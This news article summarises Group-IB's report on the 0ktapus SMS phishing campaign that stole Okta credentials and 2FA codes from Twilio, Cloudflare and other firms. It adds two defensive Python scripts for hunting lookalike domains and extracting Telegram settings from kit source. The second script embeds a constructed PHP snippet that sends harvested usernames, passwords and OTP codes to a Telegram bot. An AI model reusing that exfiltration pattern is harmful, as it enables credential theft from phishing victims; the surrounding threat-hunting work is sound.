Group-IB specialists have published a detailed report on the 0ktapus campaign. Experts said the recent phishing attacks against Twilio and Cloudflare employees were part of this massive campaign, which resulted in 9,931 accounts compromised at more than 130 companies.
Recall that the Twilio hack occurred in early August 2022. Unknown attackers phished the company's employees, stole their account credentials and then used them to access information about some of Twilio's customers.
As became known later, the incident affected 163 Twilio customer companies, and Cloudflare, MailChimp and Klaviyo soon reported similar attacks. The attacks then cascaded: because the listed companies were compromised, their own customers suffered as well, for example the Signal messenger, which was affected through the Twilio breach.
Also, according to media reports, among the targets of the hackers were Coinbase, KuCoin, Binance, Microsoft, Telus, Verizon Wireless, T-Mobile, AT&T, Sprint, Rogers, Mailgun, Slack, Box, SendGrid, Yahoo, Sykes, BestBuy and Infosys.
According to Group-IB analysts, there were far more victims overall, and the 0ktapus campaign has been active since at least March 2022. Its main goal was to steal Okta credentials and two-factor authentication (2FA) codes and use them for follow-on supply-chain attacks. The report states that the vast majority of 0ktapus victims are located in the US, and many of them use Okta's identity and access management services.
On July 26, 2022, the Group-IB team received a request from a client asking for more information about a recent phishing attempt targeting its employees. The investigation revealed that these phishing attacks, as well as the Twilio and Cloudflare incidents, were links in the same chain: a simple but highly effective phishing campaign of unprecedented scale and scope. Worse, the exposure of 1,900 Signal users clearly showed that once the attackers compromised one organization, they could quickly pivot to supply-chain attacks on its customers.
“While the attackers may have been lucky in these attacks, it is much more likely that they carefully crafted this phishing campaign to launch sophisticated attacks against the supply chain. It is not yet clear whether the “penetrating” attacks were planned in advance or whether opportunistic actions were taken at each stage. Regardless, the 0ktapus campaign has been incredibly successful and its full scope may not be clear for some time to come,” says Robert Martinez, Senior Threat Intelligence Analyst at Group-IB.
As noted above, the attackers' main goal was to obtain Okta credentials and 2FA codes from employees of the target organizations. Victims received text messages containing links to phishing sites that imitated their organization's Okta authentication page.
It is still unknown how the hackers compiled their target list and obtained the phone numbers of the target employees. However, according to Group-IB, the attackers first ran a campaign against mobile operators and telecommunications companies, probably as preparation and data collection for the later waves.
In total, the researchers found 169 unique phishing domains involved in 0ktapus. The domains used keywords such as "SSO", "VPN", "OKTA", "MFA" and "HELP". From the victim's point of view, the phishing sites looked convincing and resembled the legitimate authentication page they were used to. All of the sites were built with the same phishing kit, previously unknown to researchers.
While studying the kit's code, analysts found strings relating to the configuration of a Telegram bot, as well as the channel the hackers used to collect the compromised data. Thanks to this, the researchers were able to analyze the data the attackers had collected since March 2022.
In total, the hackers stole the credentials of 9,931 users, including 3,129 records with email addresses and 5,441 records with multi-factor authentication codes. Since two-thirds of the records contained no corporate email address, only usernames and 2FA codes, the researchers could often determine only the region where the victims lived: of the 136 companies attacked, 114 are located in the United States.
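The naming pattern described above (a target or IdP name combined with words like "SSO", "VPN", "OKTA", "MFA" or "HELP") is something a defender can hunt for in certificate-transparency or newly-registered-domain feeds. The following triage script is an added example written for this article, not Group-IB's tooling or anything from the report. The keyword list is the one the report gives; the brand "acme", the allow-list and every domain in the sample feed are constructed for the demo and are not real indicators.

```python
"""Triage candidate domains in the 0ktapus naming style.

Added example, not code from Group-IB or the report. The keyword list is the
one the report describes; the brand "acme", the allow-list and every domain
below are constructed for the demo, not real indicators.
"""
from __future__ import annotations

KEYWORDS = ("sso", "vpn", "okta", "mfa", "help")   # from the report
BRAND = "acme"                                       # hypothetical target org

# Hosts an Okta customer legitimately sees. Assumed list; adjust to your tenant.
ALLOWLIST = ("okta.com", "oktapreview.com", "okta-emea.com", "acme.com")


def is_allowlisted(domain: str) -> bool:
    """Exact or subdomain match; a bare endswith() would let evilacme.com through."""
    return any(domain == a or domain.endswith("." + a) for a in ALLOWLIST)


def registrable(domain: str) -> str:
    """Naive eTLD+1 (last two labels). Enough for the demo TLDs; use a
    public-suffix library on real data so co.uk-style suffixes are handled."""
    return ".".join(domain.split(".")[-2:])


def score_domain(domain: str) -> tuple[int, list[str]]:
    """Return (score, reasons). Higher means more 0ktapus-like."""
    d = domain.lower().rstrip(".")
    if is_allowlisted(d):
        return 0, ["allow-listed"]
    labels = d.split(".")
    apex_label = registrable(d).split(".")[0]      # "acme-sso" in acme-sso.com
    subdomain = ".".join(labels[:-2])              # "" when there is none
    score, reasons = 0, []
    kw_hits = [k for k in KEYWORDS if k in apex_label or k in subdomain]
    for k in kw_hits:
        score += 1
        reasons.append(f"keyword:{k}")
    if BRAND in d:
        score += 2
        reasons.append(f"brand:{BRAND}")
        if kw_hits:                                 # brand + IdP/VPN word is the classic lure
            score += 2
            reasons.append("brand+keyword")
    return score, reasons


def triage(domains, threshold: int = 2) -> list[tuple[str, int, list[str]]]:
    """Keep domains at or above threshold, highest score first (stable order)."""
    scored = [(d, *score_domain(d)) for d in domains]
    return sorted([r for r in scored if r[1] >= threshold], key=lambda r: -r[1])


# Constructed sample: what a CT-log or new-domain feed might hand you.
SAMPLE = [
    "acme.okta.com",           # legitimate tenant login
    "acme-sso.com",            # brand + keyword: high
    "okta-help.com",           # IdP name + support word
    "acme.mfa-login.net",      # brand in subdomain, keyword at apex
    "acme-vpn-sso.com",
    "weather.example.org",     # noise
]

if __name__ == "__main__":
    for d, s, why in triage(SAMPLE):
        print(f"{s:2d}  {d:24s} {', '.join(why)}")
```

The allow-list check matters more than it looks: the legitimate login page for an Okta customer lives under the tenant's own `okta.com` subdomain, so any other registrable domain carrying the IdP name is worth a look, while a plain `endswith("okta.com")` would also accept attacker-registered lookalikes such as `evilokta.com`.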
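Kits that exfiltrate over Telegram usually hard-code the bot token and the destination chat or channel id in their source, which is the kind of string the analysts describe finding. The script below is an added example for this article, not Group-IB's tooling: it pulls those settings, the Bot API method and the harvested form fields out of a kit's source. The PHP snippet it scans is constructed to imitate such a kit; the token and channel id in it are made up and do not work. A recovered token is evidence for the investigating team and Telegram's abuse channel, not something to call from your own infrastructure.

```python
"""Extract Telegram exfiltration settings from phishing-kit source.

Added example, not Group-IB's tooling. The PHP sample is constructed for the
demo; the bot token and channel id are fake and non-functional.
"""
import re

# Telegram bot tokens look like "<numeric bot id>:<35-char secret>".
TOKEN_RE = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{35})\b")
# Supergroup/channel ids are negative and start with -100; catch them even
# when the kit stores them in a variable rather than in the URL.
CHANNEL_ID_RE = re.compile(r"(-100\d{9,10})\b")
# Also catch a literal chat_id= in a hard-coded URL (positive ids are DMs).
CHAT_PARAM_RE = re.compile(r"chat_id=(-?\d{6,14})\b")
# Which Bot API method the kit calls (sendMessage, sendDocument, ...).
API_RE = re.compile(r"https?://api\.telegram\.org/bot[^\s\"'/]+/(\w+)")
# Which form fields the kit harvests; the report describes creds + 2FA codes.
FIELD_RE = re.compile(r"""\$_(?:POST|GET|REQUEST)\[["'](\w+)["']\]""")

# Constructed sample source, imitating the pattern described; NOT a real kit.
CONSTRUCTED_KIT_SOURCE = r'''
<?php
// constructed sample, not from a real kit
$bot  = "1234567890:AAFakeTokenForTheDemo_abcdefghijklm";
$chat = "-1001234567890";
$msg  = "user=" . $_POST["username"] . " pass=" . $_POST["password"] . " otp=" . $_POST["mfa"];
file_get_contents("https://api.telegram.org/bot$bot/sendMessage?chat_id=$chat&text=" . urlencode($msg));
?>
'''


def extract_telegram_config(source: str) -> dict:
    """Return tokens, bot ids, chat ids, API methods and harvested fields."""
    tokens = [f"{bot_id}:{secret}" for bot_id, secret in TOKEN_RE.findall(source)]
    chat_ids = sorted(set(CHANNEL_ID_RE.findall(source)) | set(CHAT_PARAM_RE.findall(source)))
    return {
        "tokens": tokens,
        "bot_ids": [t.split(":", 1)[0] for t in tokens],
        "chat_ids": chat_ids,
        "api_methods": sorted(set(API_RE.findall(source))),
        "exfiltrated_fields": sorted(set(FIELD_RE.findall(source))),
    }


def redact_token(token: str) -> str:
    """Keep the bot id (a stable IOC) and 4 chars of the secret for reports."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


if __name__ == "__main__":
    cfg = extract_telegram_config(CONSTRUCTED_KIT_SOURCE)
    for t in cfg["tokens"]:
        print("bot token :", redact_token(t))
    print("chat ids  :", cfg["chat_ids"])
    print("methods   :", cfg["api_methods"])
    print("harvests  :", cfg["exfiltrated_fields"])
```

The bot id (the numeric half of the token) is the useful pivot: it stays the same across every kit copy that reuses the bot, so it links deployments the way a shared C2 address would, while the secret half should be handled as a credential and redacted in anything that leaves the incident team.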
Most of the victims are related to IT, software development and cloud services, but the attackers were also interested in cryptocurrency projects and firms involved in finance and recruiting.
Telegram allowed experts to get some information about the channel that was used along with the phishing kit, such as its name, as well as details of the users who administer it.
It turned out that the second administrator of the channel in question hides behind the nickname "X". The researchers say they used the Group-IB Threat Intelligence system to find one of X's posts from 2019, which eventually led to his Twitter account. The same tool helped establish the administrator's first and last name. A search for the Twitter username also turned up a GitHub account with the same username and profile picture. As a result, analysts concluded that "X" is located in North Carolina, USA.
“The methods used by these attackers are not out of the ordinary, but the planning and how they moved from one company to another makes this campaign worthy of attention. 0ktapus shows how vulnerable modern organizations are to attacks built on basic social engineering, and how far-reaching the consequences of such incidents for their partners and clients can be,” sums up Rustam Mirkasymov, Head of Cyber Threat Research at Group-IB Europe.
It must be said that after the publication of the Group-IB report, new 0ktapus victims came forward, fully confirming the experts' gloomy forecasts. It became known that three companies at once had suffered hacker attacks and data leaks: